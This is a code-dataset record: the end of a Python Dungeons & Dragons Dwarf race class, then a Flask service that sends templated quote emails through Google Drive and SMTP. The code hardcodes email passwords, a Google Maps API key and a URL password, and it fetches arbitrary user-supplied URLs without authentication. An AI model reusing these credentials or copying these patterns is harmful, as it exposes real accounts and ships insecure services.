self.darkvision = 60\n        self.featuresAndTraits = [\"dwarven resilience: You have advantage on saving throws against poison, and you have resistance against poison damage.\"]\n        tp = \"tool proficiency: \" + str(chooseToolProficiency())\n        self.otherProficiencies = [\"dwarven combat training: You have proficiency with the battleaxe, handaxe, throwing hammer, and warhammer.\",\n                                   tp,\n                                   \"stonecunning: Whenever you make an Intelligence (History) check related to the origin of stone work, you are considered proficient in the History skill and add double your proficiency bonus to the check, instead of your normal proficiency bonus.\"]\n        if(subrace == \"mountain\"):\n            self.otherProficiencies.append(\"dwarven armor training: You have proficiency with light and medium armor.\")\n\n\n#//----------// //----------// //----------//\n# Other methods associated with the Dwarf race\n#//----------// //----------// //----------//\n    def abilityScoreIncrease(self):\n        stats = self.getStats()\n        print(\"Your Constitution score increases by 2.\")\n        con = stats.getStat(\"constitution\")\n        con.setScore(con.getScore() + 2)\n        stats.setStat(con)\n        if(super().getSubrace() == \"hill\"):\n            print(\"Your Wisdom score increases by 1.\")\n            wis = stats.getStat(\"wisdom\")\n            wis.setScore(wis.getScore() + 1)\n            stats.setStat(wis)\n        elif(super().getSubrace() == \"mountain\"):\n            print(\"Your Strength score increases by 2\")\n            
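# editor's note: this mountain-subrace branch raises Strength, mirroring the Wisdom bump in the hill branch above\n            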
strength = stats.getStat(\"strength\")\n strength.setScore(strength.getScore() + 2)\n stats.setStat(strength)\n super().setStats(stats)\n\n#//----------// //----------// //----------//\n# Print methods:\n# These methods will print out all of the\n# variables.\n#//----------// //----------// //----------//\n def printRace(self, printStats: bool):\n super().printRace(printStats)\n print(\"Darkvision:\", self.getDarkvision())\n\n#//----------// //----------// //----------//\n# Check methods:\n# These methods will give a boolean value.\n#//----------// //----------// //----------//\n def checkAge(self, age: int) -> int:\n if(age < 0):\n print(\"You are too young. Setting age to 50.\")\n return 50\n elif(age > 350):\n print(\"You are too old. Setting age to 350.\")\n return 350\n else:\n return age\n\n # checks that the dwarf is at least medium hight\n # which is 48 in to 96 ft\n def checkHeight(self, height: int) -> bool:\n if(height >= 48 and height <= 96):\n return True\n else:\n return False\n\n def checkSubrace(self, subrace: str) -> bool:\n subrace = subrace\n if(subrace == \"hill\" or subrace == \"mountain\"):\n return True\n else:\n return False\n\n\n#//----------// //----------// //----------//\n# Get and Set methods\n#//----------// //----------// //----------//\n def getAge(self) -> int:\n age = self.checkAge(self.age)\n if(age == self.age):\n return age\n else:\n self.setAge(age)\n return age\n\n def setAge(self, age: int):\n age = self.checkAge(age)\n self.age = age\n\n def getDarkvision(self) -> int:\n return self.darkvision\n\n def setDarkvision(self, darkvision:int):\n if(darkvision > 60):\n self.darkvision = darkvision\n\n def getHeight(self) -> int:\n if(not self.checkHeight(48)):\n self.setHeight(48)\n return self.height\n\n def setHeight(self, height: int):\n if(self.checkHeight(height)):\n super().setHeight(height)\n else:\n print(\"Height not a medium creature. 
A dwarf is a medium creature between 4 ft and 5 ft, but medium creatures are between 4 ft and 8 ft\")\n            super().setHeight(48)\n\n    def getSubrace(self) -> str:\n        if(self.checkSubrace(self.subrace)):\n            return self.subrace\n        else:\n            self.setSubrace(\"hill\")\n            return self.subrace\n\n    def setSubrace(self, subrace: str):\n        # fall back to \"hill\" only when the requested subrace is not a valid option\n        if(not self.checkSubrace(subrace)):\n            subrace = \"hill\"\n        self.subrace = subrace\n\n#//----------// //----------// //----------//\n# Main Class\n#//----------// //----------// //----------//\n","sub_path":"Server/Races/Dwarf.py","file_name":"Dwarf.py","file_ext":"py","file_size_in_byte":5345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"249854654","text":"from __future__ import print_function\nfrom apiclient.discovery import build\nfrom apiclient import errors\n\nfrom httplib2 import Http\nfrom oauth2client import file, client, tools\nimport urllib\n\n\nimport logging\nlogging.basicConfig()\n\n\nfrom flask import *\nimport json\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.application import MIMEApplication\nfrom email.mime.image import MIMEImage\nfrom apiclient.http import MediaIoBaseDownload\nfrom werkzeug import secure_filename\nfrom flask_cors import CORS\nimport io\nimport time, datetime\nimport shutil\nimport re\nimport os\nimport requests, calendar\nfrom apscheduler.scheduler import Scheduler\nfrom pytz import timezone\nimport pytz\nfrom io import BytesIO\n\npath = os.path.dirname(__file__)\n# modify this to change the Template Directory\n\napp = Flask(__name__)\nCORS(app)\n\n# Scheduler setup\nsched = Scheduler()  # Scheduler object\nsched.start()\n\n\n# final 6/30/18\n\ndef getfilenamebyId(service, file_id):\n    try:\n        file = service.files().get(fileId=file_id).execute()\n        if file['mimeType'] == 'application/vnd.google-apps.folder':\n            return \"\"\n        else:\n            return file['title']\n    except:\n        pass\n    return \"\"\n\n\n# final 6/30/18\n\ndef download(service, fileIds, prefix):\n    fileNames = []\n    for id in fileIds:\n        result = getfilenamebyId(service, id)\n        if result != \"\":\n            name = prefix + \"/\" + result\n            fileNames.append(name)\n            req = service.files().get_media(fileId=id)\n            fh = io.FileIO(name, 'w')\n            downloader = MediaIoBaseDownload(fh, req)\n            done = False\n            try:\n                while done is False:\n                    status, done = downloader.next_chunk()\n            except Exception as inst:\n                return \"Failed in downloading html file. 
please check fileId again\"\n fh.close()\n return fileNames\n\n\n# final 6/30/18\n\nclass EmailTemplate():\n def __init__(self, template_name='', values={}, html=True):\n self.template_name = template_name\n self.values = values\n self.html = html\n\n def render(self):\n content = open(self.template_name).read()\n\n for k, v in self.values.items():\n content = content.replace('[%s]' % k, v)\n return content\n\n\n# final 6/30/18\n\nclass MailMessage(object):\n html = False\n\n def __init__(self, from_email='', to_emails=[], cc_emails=[], reply_to=[], subject='', body='', qattachment='',\n template=None, templatefiles=[], attachments=[]):\n self.from_email = from_email\n self.reply_to = reply_to\n self.to_emails = to_emails\n self.cc_emails = cc_emails\n self.subject = subject\n self.template = template\n self.body = body\n self.file_attachments = attachments\n self.templatefiles = templatefiles\n self.qattachment = qattachment\n\n def attach_file(self, path):\n self.file_attachments.append(path)\n\n def get_message(self):\n if isinstance(self.to_emails, str):\n self.to_emails = [self.to_emails]\n\n if isinstance(self.reply_to, str):\n self.reply_to = [self.reply_to]\n\n if isinstance(self.cc_emails, str):\n self.cc_emails = [self.cc_emails]\n\n if isinstance(self.qattachment, str):\n self.qattachment = [self.qattachment]\n\n if len(self.to_emails) == 0 or self.from_email == '':\n raise ValueError('Invalid From or To email address(es)')\n\n msg = MIMEMultipart('alternative')\n # msg = MIMEMultipart('multipart/mixed')\n msg['To'] = ', '.join(self.to_emails)\n msg['Reply-to'] = ', '.join(self.reply_to)\n msg['Cc'] = ', '.join(self.cc_emails)\n msg['From'] = self.from_email\n msg['Subject'] = self.subject\n\n msgAlternative = MIMEMultipart('mixed')\n msg.attach(msgAlternative)\n\n msgText = MIMEText('This is the alternative plain text message.')\n msgAlternative.attach(msgText)\n\n if self.template:\n if self.template.html:\n msgAlternative.attach(MIMEText(self.template.render(), 'html'))\n else:\n msgAlternative.attach(MIMEText(self.template.render(), 'plain'))\n else:\n msgAlternative.attach(MIMEText(self.body, 'plain'))\n\n for file in self.templatefiles:\n # ORIG with open(attachment, \"rb\") as f:\n # ORIGfilename = os.path.basename(attachment)\n fp = open(file, 'rb')\n msgImage = MIMEImage(fp.read())\n fp.close()\n cids = file.split(\"/\")\n cid = cids[len(cids) - 1]\n msgImage.add_header('Content-ID', '<' + cid + '>')\n msgImage.add_header('Content-Disposition', 'inline', filename=os.path.basename(file))\n msg.attach(msgImage)\n\n for attachment in self.file_attachments:\n with open(attachment, \"rb\") as f:\n filename = os.path.basename(attachment)\n part = MIMEApplication(f.read(), Name=filename)\n part['Content-Disposition'] = 'attachment; filename=\"' + str(filename) + '\"'\n msg.attach(part)\n try:\n if self.qattachment != \"\" and os.path.exists(self.qattachment):\n with open(self.qattachment, \"rb\") as f:\n filename = os.path.basename(self.qattachment)\n part = MIMEApplication(f.read(), Name=filename)\n part['Content-Disposition'] = 'attachment; filename=\"' + str(filename) + '\"'\n msg.attach(part)\n except:\n pass\n # ORIG part = MIMEApplication(f.read(), Name=filename)\n # ORIG part['Content-Disposition'] = 'attachment; filename=\"' + str(filename) + '\"'\n # ORIG msg.attach(part)\n return msg\n\n\n# final 6/30/18\n\nclass MailServer(object):\n msg = None\n\n def __init__(self, server_name='smtp.gmail.com', username='', password='', port=587,\n require_starttls=True):\n 
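# editor's note: plain value object holding SMTP connection settings; the defaults assume Gmail's STARTTLS endpoint on port 587\n        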
self.server_name = server_name\n self.username = username\n self.password = password\n self.port = port\n self.require_starttls = require_starttls\n\n\n# final 6/30/18\n\ndef send(mail_msg, mail_server=MailServer()):\n server = smtplib.SMTP(mail_server.server_name, mail_server.port)\n if mail_server.require_starttls:\n server.starttls()\n if mail_server.username:\n server.login(mail_server.username, mail_server.password)\n\n server.sendmail(mail_msg.from_email, (mail_msg.to_emails + mail_msg.cc_emails), mail_msg.get_message().as_string())\n server.close()\n\n\n# final 6/30/18\n\ndef getConnection():\n SCOPES = 'https://www.googleapis.com/auth/drive'\n store = file.Storage(path + '/credentials.json')\n creds = store.get()\n\n if not creds or creds.invalid:\n flow = client.flow_from_clientsecrets(path + '/client_secret.json', SCOPES)\n creds = tools.run_flow(flow, store)\n\n service = build('drive', 'v2', http=creds.authorize(Http()))\n return service\n\n\n# final 6/30/18\n\ndef get_files_in_folder(service, folder_id):\n \"\"\"Print files belonging to a folder.\n\n Args:\n service: Drive API service instance.\n folder_id: ID of the folder to print files from.\n \"\"\"\n page_token = None\n file_ids = []\n while True:\n try:\n param = {}\n if page_token:\n param['pageToken'] = page_token\n children = service.children().list(\n folderId=folder_id, **param).execute()\n\n for child in children.get('items', []):\n file_ids.append(child['id'])\n page_token = children.get('nextPageToken')\n if not page_token:\n break\n except errors.HttpError as error:\n print('An error occurred: %s' % error)\n break\n\n return file_ids\n\n\n# final 6/30/18\ndef get_fileNames_in_folder(service, folder_id):\n \"\"\"Print files belonging to a folder.\n\n Args:\n service: Drive API service instance.\n folder_id: ID of the folder to print files from.\n \"\"\"\n page_token = None\n file_ids = []\n while True:\n try:\n param = {}\n if page_token:\n param['pageToken'] = page_token\n # children = service.children().list(\n # folderId=folder_id, **param).execute()\n query = \"'{}' in parents\".format(folder_id)\n children = service.files().list(\n q=query, fields='nextPageToken, files(id, name)').execute()\n return children\n for child in children.get('items', []):\n return child\n file_ids.append(child['name'])\n page_token = children.get('nextPageToken')\n if not page_token:\n break\n except errors.HttpError as error:\n print('An error occurred: %s' % error)\n break\n return file_ids\n\n\n# final 6/30/18\n@app.route('/')\ndef hello_world():\n return render_template('index.html')\n\n\n# NOTfinal 6/30/18\n\n@app.route('/sendEmail', methods=['POST'])\ndef sendEmail():\n if request.method == 'POST':\n ############## Get params from request ###############\n ## reply_to : destination email\n ## file_id : email file id of google drive %% You can get file id using this end point \"ec2-18-216-179-182.us-east-2.compute.amazonaws.com/fileList\"\n ## subject : Subject of Email\n ## attachment : attach file params\n ## address : Address information\n ## price : Price param\n ## name : Name param\n #######################################################\n\n if 'msg[Reply_to]' in request.form:\n Reply_to = request.form['msg[Reply_to]']\n else:\n return json.dumps({\"error\": \"Failed! Missing parameter 'msg[Reply_to]'\"})\n\n if 'msg[To]' in request.form:\n Email_To = request.form['msg[To]']\n else:\n return json.dumps({\"error\": \"Failed! 
Missing parameter 'msg[To]'\"})\n\n templateID_folder = \"\"\n if 'templateID_folder' in request.form:\n templateID_folder = request.form['templateID_folder']\n\n if 'attachFiles' not in request.form:\n return json.dumps({\"error\": \"Failed! Missing parameter 'templateID_folder' or 'attachFiles'\"})\n\n if 'address' in request.form:\n address = request.form['address']\n else:\n return json.dumps({\"error\": \"Failed! Missing parameter 'address'\"})\n\n if 'price' in request.form:\n price = request.form['price']\n else:\n return json.dumps({\"error\": \"Failed! Missing parameter 'price'\"})\n\n if 'name' in request.form:\n name = request.form['name']\n else:\n return json.dumps({\"error\": \"Failed! Missing parameter 'name'\"})\n\n templateID = \"\"\n if 'templateID' in request.form:\n templateID = request.form['templateID']\n elif 'template' not in request.files:\n return json.dumps({\"error\": \"No template or templateID found!\"})\n\n if 'subject' in request.form:\n subject = request.form['subject']\n else:\n return json.dumps({\"error\": \"Failed! Missing parameter 'subject'\"})\n\n prefix = path + \"/uploads/\" + str(int(round(time.time() * 1000)))\n if not os.path.exists(prefix):\n os.makedirs(prefix)\n os.makedirs(prefix + \"/attachments\")\n\n if 'template' in request.files:\n uploadfile = request.files.getlist(\"template\")\n for file in uploadfile:\n templateFileName = os.path.join(prefix + \"/\", secure_filename(file.filename))\n file.save(templateFileName)\n\n attachFileNames = []\n if 'attachFiles' in request.files:\n uploadsFiles = request.files.getlist(\"attachFiles\")\n for file in uploadsFiles:\n fileName = os.path.join(prefix + \"/\", secure_filename(file.filename))\n attachFileNames.append(fileName)\n file.save(fileName)\n\n ## get instance of connection for google drive\n service = getConnection()\n\n if templateID != \"\":\n templateFileName = prefix + \"/email.html\"\n ## download file which id is file_id and save as \"email.html\"\n req = service.files().get_media(fileId=templateID)\n fh = io.FileIO(templateFileName, 'w')\n downloader = MediaIoBaseDownload(fh, req)\n\n done = False\n try:\n while done is False:\n status, done = downloader.next_chunk()\n except Exception as inst:\n return json.dumps({\"error\": \"Failed in downloading html file. 
please check fileId again\"})\n fh.close()\n ### download attached files\n # templateID_folder = \"1Tnw9ShNslKIwt7awqxQQ7Awva7rMXE3T\"\n if templateID_folder != \"\":\n fileIds = get_files_in_folder(service, templateID_folder)\n attachFileNames = download(service, fileIds, prefix + \"/attachments\")\n\n ## Define values which are needed to exchange with email text.\n values = {}\n # values['username'] = 'mail@gmail.com'\n # values['from'] = 'mail@gmail.com'\n # values['url'] = ''\n femail = 'ashley@la-retrofit.com'\n femailp = 'TempPass123456@'\n # femail='matt.engineering79@gmail.com'\n if '@la-retrofit.com' in femail:\n servern = 'smtp.office365.com'\n port_ = 587\n if '@gmail.com' in femail:\n servern = 'smtp.gmail.com'\n port_ = 587\n\n ## Sending email to Email_To\n temp = EmailTemplate(template_name=templateFileName, values=values)\n server = MailServer(server_name=servern, username=femail,\n password=femailp,\n port=port_, require_starttls=True)\n msg = MailMessage(from_email=femail, to_emails=[Email_To], reply_to=[Reply_to], subject=subject, template=temp,\n attachments=attachFileNames)\n send(mail_msg=msg, mail_server=server)\n\n ## delete downloaded files\n # os.remove(templateFileName)\n # for name in attachFileNames:\n # if (os.path.exists(name)):\n # os.remove(name)\n # shutil.rmtree(prefix)\n # return json.dumps({\"success\": \"sent email to 2 \" + Email_to})\n\n\n# final 6/30/18\n## Get file list of google drive\n@app.route('/fileList')\ndef fileList():\n # Setup the Drive v2 API\n service = getConnection()\n print(\"here\")\n result = []\n page_token = None\n while True:\n try:\n param = {}\n if page_token:\n param['pageToken'] = page_token\n files = service.files().list(**param).execute()\n\n result.extend(files['items'])\n page_token = files.get('nextPageToken')\n if not page_token:\n break\n except errors.HttpError as error:\n print('An error occurred: %s' % error)\n break\n return json.dumps({'lists': result})\n\n #\n # # Call the Drive v2 API\n # results = service.files().list(\n # fields=\"nextPageToken, files(id, name)\").execute()\n # items = results.get('files', [])\n # if not items:\n # return \"File Not Found\"\n # else:\n # return json.dumps({'lists': items})\n\n\n# final 6/30/18\n# rest api to send email\n@app.route('/restApi', methods=['POST'])\ndef uploads():\n if request.method == 'POST':\n # MAIN MAIN\n ############## Get params from request ###############\n ## reply_to : destination email\n ## file_id : email file id of google drive %% You can get file id using this end point \"ec2-18-216-179-182.us-east-2.compute.amazonaws.com/fileList\"\n ## subject : Subject of Email\n ## attachment : attach file params\n ## address : Address information\n ## price : Price param\n ## name : Name param\n #######################################################\n\n if 'msg[Reply_to]' in request.form:\n Reply_to = request.form['msg[Reply_to]']\n else:\n return json.dumps({\"error\": \"Failed! Missing parameter 'msg[Reply_to]'\"})\n\n if 'msg[To]' in request.form:\n Email_To = request.form['msg[To]']\n else:\n return json.dumps({\"error\": \"Failed! Missing parameter 'msg[To]'\"})\n\n Email_CC = ''\n if 'msg[CC]' in request.form:\n Email_CC = request.form['msg[CC]']\n\n templateID_folder = \"\"\n if 'templateID_folder' in request.form:\n templateID_folder = request.form['templateID_folder']\n else:\n return json.dumps({\"error\": \"Failed! 
Missing parameter 'templateID_folder'\"})\n\n if 'attachFiles' in request.form:\n attachFiles = request.form['attachFiles'];\n else:\n return json.dumps({\"error\": \"Failed! Missing parameter 'templateID_folder' or 'attachFiles'\"})\n\n if 'address' in request.form:\n address = request.form['address']\n else:\n return json.dumps({\"error\": \"Failed! Missing parameter 'address'\"})\n\n if 'price' in request.form:\n price = request.form['price']\n else:\n return json.dumps({\"error\": \"Failed! Missing parameter 'price'\"})\n\n if 'name' in request.form:\n name = request.form['name']\n else:\n return json.dumps({\"error\": \"Failed! Missing parameter 'name'\"})\n\n quote = 0\n if 'quote' in request.form:\n quote = int(request.form['quote'])\n else:\n quote = 0\n\n prclim = \"\"\n if 'prclim' in request.form:\n prclim = request.form['prclim']\n else:\n return json.dumps({\"error\": \"Failed! Missing parameter 'prclim'\"})\n\n templateID = \"\"\n if 'templateID' in request.form:\n templateID = request.form['templateID']\n elif 'template' not in request.files:\n return json.dumps({\"error\": \"No template or templateID found!\"})\n\n if 'subject' in request.form:\n subject = request.form['subject']\n else:\n return json.dumps({\"error\": \"Failed! Missing parameter 'subject'\"})\n\n \"\"\"finddeadline, deadline, fadr, remaining\"\"\"\"\"\"\"\"\"\n finddeadline = 0\n if 'finddeadline' in request.form:\n finddeadline = request.form['finddeadline']\n\n \"\"\"prefix\"\"\"\n prefix = path + \"/uploads/\" + str(int(round(time.time() * 1000)))\n if not os.path.exists(prefix):\n os.makedirs(prefix)\n\n directattach = 0\n if 'directattach' in request.form:\n directattach = request.form['directattach']\n else:\n directattach = ''\n\n ### download attached files\n service = getConnection()\n fileIds = attachFiles.replace(\" \", \"\")\n fileIds = fileIds.split(\",\")\n attachFileNames = download(service, fileIds, prefix)\n if directattach != '':\n dattachs = directattach.split(\",\")\n for da in dattachs:\n tmp = da.rfind('/')\n fnm = da[tmp + 1:]\n if \"http\" not in da.lower():\n da = da.replace('www.', 'http://www.')\n qr = requests.get(da, stream=True)\n qname = prefix + \"/\" + fnm\n fl = open(path + \"/testfile2.txt\", \"a+\")\n fl.write(da + \"\\n\" + fnm + \"\\n\" + qname + \"\\n\")\n fl.close()\n with open(qname, \"wb\") as fl:\n for chunk in qr.iter_content(chunk_size=128):\n if chunk:\n fl.write(chunk)\n # REPLACES THE CONTENT OF EMAIL\n if os.path.isfile(qname):\n attachFileNames.append(qname)\n\n # attachFileNames = []\n # if 'attachFiles' in request.files:\n # uploadsFiles = request.files.getlist(\"attachFiles\")\n # for file in uploadsFiles:\n # fileName = os.path.join(prefix + \"/\", secure_filename(file.filename))\n # attachFileNames.append(fileName)\n # file.save(fileName)\n # fl = open(path+\"/testfile2.txt\",\"a+\")\n # fl.write(fileName+\"\\n\")\n # fl.close()\n\n textfile = open(path + \"/queue.txt\", 'a')\n content = {\"Reply_to\": Reply_to, \"Email_To\": Email_To, \"templateID_folder\": templateID_folder,\n \"templateID\": templateID, \"address\": address, \"price\": price, \"name\": name, \"subject\": subject,\n \"finddeadline\": finddeadline, \"attachFileNames\": attachFileNames,\n \"recieve_time\": datetime.datetime.now().replace(microsecond=0).strftime('%m/%d/%Y-%H:%M:%S'),\n \"prclim\": prclim, \"quote\": quote, \"Email_CC\": Email_CC}\n textfile.write(json.dumps(content) + '\\n')\n textfile.close()\n return json.dumps({\"success\": \"will send email to MAIN \" + Email_To})\n 
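\n# --- Editor's sketch (not part of the original app): one way a client could enqueue a message via /restApi. ---\n# The host/port and all example values below are assumptions; the form-field names mirror the checks in uploads() above,\n# and 'attachFiles' is a comma-separated string of Google Drive file ids.\n#   import requests\n#   requests.post('http://localhost:5000/restApi', data={\n#       'msg[Reply_to]': 'ops@example.com', 'msg[To]': 'client@example.com',\n#       'templateID_folder': '<drive-folder-id>', 'templateID': '<drive-template-file-id>',\n#       'attachFiles': '<drive-file-id-1>,<drive-file-id-2>',\n#       'address': '123 Main St', 'price': '4500', 'name': 'Alex',\n#       'prclim': '', 'subject': 'Retrofit Quote'})\n# The handler only appends the request to queue.txt; the scheduled cronJob below drains one entry every 10 seconds.\n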
# EmailSendingUint(Reply_to=Reply_to, Email_To=Email_To, templateID_folder=templateID_folder, templateID=templateID, address=address, price=price,name=name, subject=subject,finddeadline=finddeadline,attachFileNames=attachFileNames)\n\n\n\"\"\"Email Send Unit for CronJob\"\"\"\n\n\ndef EmailSendingUint(prclim, Reply_to, Email_To, templateID_folder, templateID, address, price, name, subject,\n                     finddeadline, quote, Email_CC, attachFileNames=[]):\n    \"\"\"Resolve the deadline/address context for a queued message and send the templated email.\"\"\"\n    remaining = 0\n    fadr = \"\"\n    clock = \"\"\n\n    if finddeadline == '1' and address != \"\":\n        url = \"http://www.la-retrofit.com/getDEADLINE/index.php?address=\" + address\n        r = requests.get(url)\n        data = str(r.content).split('
')\n deadline = \"\"\n fl = open(path + \"/testfile.txt\", \"w\")\n fl.write(finddeadline + \"\\n\")\n fl.close()\n\n try:\n permit = data[0]\n deadline = data[1]\n fadr = data[2]\n\n except:\n pass\n if deadline != \"\":\n obj = datetime.datetime.strptime(deadline, \"%m/%d/%Y\")\n today = datetime.datetime.now().replace(hour=0).replace(minute=0).replace(second=0).replace(\n microsecond=0)\n obj = obj.replace(year=obj.year + 2)\n remaining = (obj - today).days\n clock = ''\n\n \"\"\"date_\"\"\"\"\"\"\"\"\"\n today = datetime.datetime.now(tz=pytz.utc)\n today = today.astimezone(timezone('US/Pacific'))\n day = today.day\n lastday = calendar.monthrange(today.year, today.month)[1]\n if day > int(lastday / 2):\n date_ = str(today.month) + \"/\" + str(lastday) + \"/\" + str(today.year)\n else:\n date_ = str(today.month) + \"/\" + str(int(lastday / 2)) + \"/\" + str(today.year)\n prclim = \"$1500.0 Discount Already Applied - OFFER EXPIRES \" + date_\n\n \"\"\"prefix\"\"\"\n prefix = path + \"/uploads/\" + str(int(round(time.time() * 1000)))\n if not os.path.exists(prefix):\n os.makedirs(prefix)\n os.makedirs(prefix + \"/attachments\")\n\n ## get instance of connection for google drive\n service = getConnection()\n\n if templateID != \"\":\n templateFileName = prefix + \"/email.html\"\n ## download file which id is file_id and save as \"email.html\"\n req = service.files().get_media(fileId=templateID)\n fh = io.FileIO(templateFileName, 'w')\n downloader = MediaIoBaseDownload(fh, req)\n\n done = False\n try:\n while done is False:\n status, done = downloader.next_chunk()\n except Exception as inst:\n return json.dumps({\"error\": \"Failed in downloading html file. please check fileId again\"})\n fh.close()\n ## Define values which are needed to exchange with email text.\n values = {}\n\n ## Sending email to reply_to\n femail = 'honestdev21@gmail.com'\n femailp = 'ahgifrhehdejd'\n # femail = 'honestdev21@gmail.com'\n # femailp = 'ahgifrhehdejd'\n if '@la-retrofit.com' in femail:\n servern = 'smtp.office365.com'\n port_ = 587\n if '@gmail.com' in femail:\n servern = 'smtp.gmail.com'\n port_ = 587\n\n temp = EmailTemplate(template_name=templateFileName, values=values)\n temp_ = str(temp.render())\n # Fixing Unknown Characters\n\n # rep_ = r'windows-1252'\n # temp_ = unicode(temp_, \"u\")\n temp_ = re.sub(r'[^\\x00-\\x7F]+', ' ', temp_)\n # temp_=temp_.decode('utf-8')\n # GET FULL ADDRESS\n wds = address.split(\" \")\n address = str.join('+', wds)\n url = 'https://maps.googleapis.com/maps/api/geocode/json?&key=AIzaSyAKUsjQYamRqDL8przA2r4msj_ppgCe80A&address=' + address + \"+Los+ANGELES,CA,USA\"\n resp = urllib.urlopen(url)\n jraw = resp.read()\n jdata = json.loads(jraw)\n if jdata['status'] == 'OK':\n result = jdata['results'][0]\n fadr = result['formatted_address']\n fadr_ = result['formatted_address']\n else:\n return \"error\"\n\n # download QUOTE\n qname = \"\"\n if quote == 1:\n qurl = \"http://www.la-retrofit.com/action_page.php?password=laretrofit1&address=\" + fadr + \"&price=\" + price + \"&retainer1=60&retainer2=30&time=10&prclim=\" + prclim;\n qr = requests.get(qurl, stream=True)\n qname = prefix + \"/LA-Retrofit-Quote-\" + fadr.replace(\" \", \"_\").replace(\".\", \"_\").replace(\",\", \"_\") + \".pdf\"\n qname = qname.replace(\"__\", \"_\")\n with open(qname, \"wb\") as pdf:\n for chunk in qr.iter_content(chunk_size=1024):\n if chunk:\n pdf.write(chunk)\n # REPLACES THE CONTENT OF EMAIL\n if os.path.isfile(qname):\n qname = qname\n else:\n qname = \"\"\n\n temp_ = temp_.replace(\"Hi ,\", 
\"Hi \" + name + \",\")\n temp2 = \"BUILDING 1 Address:
\" + fadr\n temp_ = temp_.replace(\"BUILDING 1 Address:\", temp2)\n\n # find the deadline\n bad = 0\n if finddeadline == '1' and clock != \"\":\n if (\"west hollywood\" not in fadr.lower()) and (\"santa monica\" not in fadr.lower()) and (\n \"beverly hills\" not in fadr.lower()):\n temp_ = temp_.replace('%DEADLINE%',\n ' ' + str(remaining) + ' ')\n else:\n bad = 1\n else:\n bad = 1\n if bad == 1:\n temp_ = temp_.replace('%DEADLINE%', '')\n temp_ = temp_.replace('DAYS LEFT TO CITY DEADLINE FOR YOUR PROPERTY', '')\n bad = 0\n\n if (prclim == ''):\n temp_ = temp_.replace(\"%PRICE%\", '$' + price);\n else:\n temp_ = temp_.replace(\"%PRICE%\", '$' + price + ' (' + prclim + ')');\n\n regex = r']+src=\\\"([^\\\">]+)'\n srcs = re.findall(regex, str(temp_))\n xn = 0\n imgn = []\n imgo = []\n src_ = ''\n for src in srcs:\n xn = xn + 1\n bi = src.rfind('/') # index of backslash\n if bi >= 0:\n n = len(src)\n imgn.append(src[bi + 1:])\n imgo.append(src)\n temp_ = temp_.replace(src, 'cid:' + src[bi + 1:])\n\n regex = r']+src=\\\"([^\\\">]+)'\n srcs = re.findall(regex, str(temp_))\n src_ = ''\n for src in srcs:\n xn = xn + 1\n bi = src.rfind('/') # index of backslash\n if bi >= 0:\n n = len(src)\n imgn.append(src[bi + 1:])\n imgo.append(src)\n temp_ = temp_.replace(src, 'cid:' + src[bi + 1:])\n\n # fix bad style\n # temp_=temp_.replace(\"if gte vml 1\",'if gte vml 1000')\n\n textfile = open(prefix + \"/email2.html\", 'w')\n textfile.write(temp_)\n textfile.close()\n values = {}\n temp = EmailTemplate(template_name=prefix + \"/email2.html\", values=values)\n ### download attached files\n # templateID_folder = \"1Tnw9ShNslKIwt7awqxQQ7Awva7rMXE3T\"\n # ONLY UPLOAD IMAGES\n templatefiles = []\n if templateID_folder != \"\":\n src_ = ''\n fileIds = get_files_in_folder(service, templateID_folder)\n FileNames = []\n for fileId_ in fileIds:\n file_ = service.files().get(fileId=fileId_).execute()\n FileName = file_['title']\n FileName = FileName.lower()\n FileNames.append(FileName)\n\n ext = ['.gif', '.png', '.jpeg', '.jpg', '.jpeg']\n xn = 0\n fids = []\n fnd = 0\n for FileName in FileNames:\n FileName = FileName.lower()\n xn = xn + 1\n if any(x in FileName for x in ext):\n if any(x in FileName for x in imgn):\n fnd = 1\n fids.append(fileIds[xn - 1])\n if fnd > 0:\n templatefiles = download(service, fids, prefix + \"/attachments\")\n\n server = MailServer(server_name=servern, username=femail,\n password=femailp,\n port=port_, require_starttls=True)\n # lets fix template file by replacing the\n # import lxml.html as LH\n # root = LH.fromstring(str(temp))\n # for el in root.iter('img'):\n # for ii in range(xn):\n # if el.attrib['src']==imgo[ii]:\n # el.attrib['src'] = img[ii]\n #\n # temp=root\n fsubject = subject + ' - ' + fadr_\n\n msg = MailMessage(from_email=femail, to_emails=[Email_To], reply_to=[Reply_to], subject=fsubject, template=temp,\n templatefiles=templatefiles, attachments=attachFileNames, qattachment=qname, cc_emails=[Email_CC])\n\n send(mail_msg=msg, mail_server=server)\n\n ###delete downloaded files\n # os.remove(templateFileName)\n # for name in attachFileNames:\n # if (os.path.exists(name)):\n # os.remove(name)\n # shutil.rmtree(prefix)\n if len(attachFileNames) > 0:\n folder = attachFileNames[0].split(\"/\")\n foldername = folder[len(folder) - 2]\n # shutil.rmtree(path + \"/uploads/\" + foldername)\n content = {\"Email_CC\": Email_CC, \"Reply_to\": Reply_to, \"Email_To\": Email_To, \"templateID_folder\": templateID_folder,\n \"templateID\": templateID, \"address\": address, \"price\": price, 
\"name\": name, \"subject\": subject,\n \"finddeadline\": finddeadline, \"attachFileNames\": attachFileNames,\n \"sent_time\": datetime.datetime.now().replace(microsecond=0).strftime('%m/%d/%Y-%H:%M:%S')}\n textfile = open(path + \"/log.txt\", 'a')\n textfile.write(json.dumps(content) + '

')\n textfile.close()\n print (\"sent email already\")\n return json.dumps({\"success\": \"sent email to MAIN \" + Email_To})\n\n\n\"\"\"Cron Job\"\"\"\n\n\ndef cronJob():\n print (\"here\")\n lines = open(path + \"/queue.txt\", 'r').readlines()\n data = {}\n flag = 0\n remaining = \"\"\n for line in lines:\n if flag == 0:\n data = json.loads(line)\n flag = 1\n print(data)\n else:\n remaining += line\n f = open(path + \"/queue.txt\", \"w\")\n f.write(remaining)\n f.close()\n if data != {}:\n EmailSendingUint(Reply_to=data['Reply_to'], Email_To=data['Email_To'],\n templateID_folder=data['templateID_folder'], templateID=data['templateID'],\n address=data['address'], price=data['price']\n , name=data['name'], subject=data['subject'], finddeadline=data['finddeadline'],\n attachFileNames=data['attachFileNames'], prclim=data['prclim'], quote=data['quote'],\n Email_CC=data['Email_CC'])\n\n\n@app.route('/email_queue')\ndef email_queue():\n lines = open(path + \"/queue.txt\").readlines()\n data = \"\"\n for line in lines:\n data += line + \"

